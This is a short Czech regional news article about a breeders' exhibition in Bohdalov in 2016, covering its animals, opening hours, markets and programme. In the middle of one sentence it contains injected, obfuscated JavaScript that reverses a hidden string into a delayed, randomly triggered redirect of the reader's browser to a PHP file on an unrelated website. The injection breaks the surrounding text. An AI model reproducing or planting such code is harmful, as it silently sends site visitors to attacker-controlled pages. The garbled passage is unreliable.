Rainbow page separator

Při chovatelské výstavě se představí na tři tisíce zvířat

Pátek, 30. září 2016

Při chovatelské výstavě se představí na tři tisíce zvířat

Bohdalov / Jubilejní dvacátý ročník chovatelské Výstavy Vysočiny se o víkendu uskuteční v Bohdalově. Pořádají ji tamní chovatelé. V sobotu bude pro veřejnost otevřena od 7 do 18 hodin, v neděli od 8 do 13 hodin. „Bude vystaveno na tři tisíce zvířat – králíci, drůbež a sebritky, holubi, kozy, ovce a další drobná a hospodářská zvířata,“ uvedla Marie Ondráková ze Základní organizace Českého svazu chovatelů v Bohdalově. Největší chovatelskou výstavu na Vysočině každoročně navštíví několik tisíc lidí.
Kromě pestré škály hospodářských i drobných zvířat, z nichž řada bude nabídnuta k prodeji, je připraven také doprovodný program a tradiční farmářské a řemeslné trhy. Le[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tos se uskuteční ve větším měřítku, přičemž návštěvníci budou moci sledovat výrobu některých produktů, děti zase čeká dílnička.
„Pro odbornou i laickou veřejnost je připraven bohatý doprovodný program, například odborné přednášky, ukázky výcviků psů, pasení ovcí nebo králičí hop,“ dodala Ondráková.